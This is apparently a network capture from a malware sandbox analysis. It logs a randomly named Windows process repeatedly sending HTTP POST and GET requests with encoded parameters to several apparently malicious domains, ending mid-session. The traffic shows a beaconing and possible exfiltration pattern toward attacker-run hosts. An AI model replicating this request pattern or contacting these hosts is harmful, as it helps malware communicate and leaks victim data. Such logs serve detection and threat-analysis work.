Dec 12, 2024 10:22:52.139734983 CET | 224 | IN
Dec 12, 2024 10:22:52.139744997 CET | 1236 | IN
Dec 12, 2024 10:22:52.139754057 CET | 1236 | IN
Dec 12, 2024 10:22:52.139774084 CET | 751 | IN


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            34 | 192.168.2.22 | 49199 | 13.248.169.48 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:22:57.440946102 CET | 2472 | OUT | POST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:58.517735958 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            35 | 192.168.2.22 | 49200 | 13.248.169.48 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:00.166151047 CET | 802 | OUT | POST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:01.250957966 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            36 | 192.168.2.22 | 49201 | 13.248.169.48 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:02.815015078 CET | 2472 | OUT | POST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:03.902789116 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            37 | 192.168.2.22 | 49202 | 13.248.169.48 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:05.469290018 CET | 540 | OUT | GET /5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:06.585774899 CET | 376 | IN | HTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Thu, 12 Dec 2024 09:23:06 GMT
                                                                                                            content-length: 255
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx"}</script></head></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            38 | 192.168.2.22 | 49203 | 81.2.196.19 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:12.125231981 CET | 2472 | OUT | POST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:13.404472113 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            39 | 192.168.2.22 | 49204 | 81.2.196.19 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:14.780477047 CET | 823 | OUT | POST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:16.058168888 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            40 | 192.168.2.22 | 49205 | 81.2.196.19 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:17.444489956 CET | 2472 | OUT | POST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:17.565887928 CET | 1776 | OUT
                                                                                                            Dec 12, 2024 10:23:18.719711065 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            41 | 192.168.2.22 | 49206 | 81.2.196.19 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:20.097759008 CET | 547 | OUT | GET /k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:21.379368067 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:21 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            42 | 192.168.2.22 | 49207 | 172.67.215.235 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:26.874097109 CET | 2472 | OUT | POST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:26.993562937 CET | 297 | OUT
                                                                                                            Dec 12, 2024 10:23:28.043258905 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFPT%2Fwia1vBxDhQJW7JEVvRlOkxN1mBLJpIjO7EV7ZJAEsgyiBhM16j%2Bdmk0%2BxZYS6g72lrwPmDiePAj96%2F%2FmN0G5F4%2FOaK%2BhmQfXFD7rId%2FLFNKgHyd%2BJO8%2B4ODOuo4e1GLng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca7e21b037287-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2769&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                                                                                                            Dec 12, 2024 10:23:28.043275118 CET | 127 | IN
                                                                                                            Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            43 | 192.168.2.22 | 49208 | 172.67.215.235 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:29.529061079 CET | 808 | OUT | POST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:30.781925917 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l5QjRZ7m8kzoa8Ml%2Baag49c82MFt7qs3Uw2XUex%2FaolxKQolwE7E3Ul1sfaojxBDGuG%2B9YQ5jLuHXlrMYVnhHSWqElfDUdRqI4xp53AckYc1tgehugWz5SG9gjOFyZmAqGkVuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca7f34fcd42c6-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE
                                                                                                            Dec 12, 2024 10:23:30.781943083 CET | 111 | IN
                                                                                                            Data Ascii: and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            44 | 192.168.2.22 | 49209 | 172.67.215.235 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 12, 2024 10:23:32.190774918 CET | 2472 | OUT | POST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:32.310126066 CET | 1761 | OUT
                                                                                                            Dec 12, 2024 10:23:33.441935062 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9X31UpTv4L3iN%2F%2F2nm61j2iGLxv6RFVHKnPBrG4gwWbUREEEKkXn31ZvOW%2Bek17vtOOsFmZ45i5KbfJIRxDW1doBQPwrKjhy9qd10P78YTB7HnLwQFR2BlMXFSFImoJWUs2gSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca803f9915e7c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2071&rtt_var=1035&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4233&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.22 | 49210 | 172.67.215.235 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:23:34.840564966 CET | 542 | OUT | GET /gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:23:36.102161884 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Thu, 12 Dec 2024 09:23:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XacOeoS9crCYvQMx1vShV7cR1OOS7bOjNPgLJdr1H5SHjftbGtocKYshBKHvH9%2FwOuZ46sDhTbymNZ%2BRSkS3PUHrBDG1%2BLR1mKUD%2BhpKFYFuh3buecxJ2EihLqlAUqRogwScmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca8148ca543d0-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=542&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.22 | 49211 | 172.67.145.234 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:23:42.382726908 CET | 2472 | OUT | POST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:23:43.603740931 CET | 959 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiFVU4h0fkkU8Pefzot4px3xPyk0Mp7u6Q2EojwrvNTgIo3223LnSwzYfZI3f1EnvaipqjCnUVci%2FP7WTODlFrLX3FnXqePhaIaP6IIljAaBt49elFE2mjYIL64W%2FWAA"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca843aeda4269-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2322&rtt_var=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2757&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.22 | 49212 | 172.67.145.234 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:23:45.458267927 CET | 796 | OUT | POST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:23:46.671324015 CET | 961 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:46 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSwgAPS8SaycOJ1sORdTduPG3AcX16aUGES9tKRy2V9o0ptbx5UcojZr7ZVbAoEOl9njSD%2B8FpeYx4T3hU7y18QF32GKkSrA9RkhcXzf6dEaPJkykgmK8Qn1r1I9kYfk"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca856dc487ce2-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2031&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.2.22 | 49213 | 172.67.145.234 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:23:48.118287086 CET | 2472 | OUT | POST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
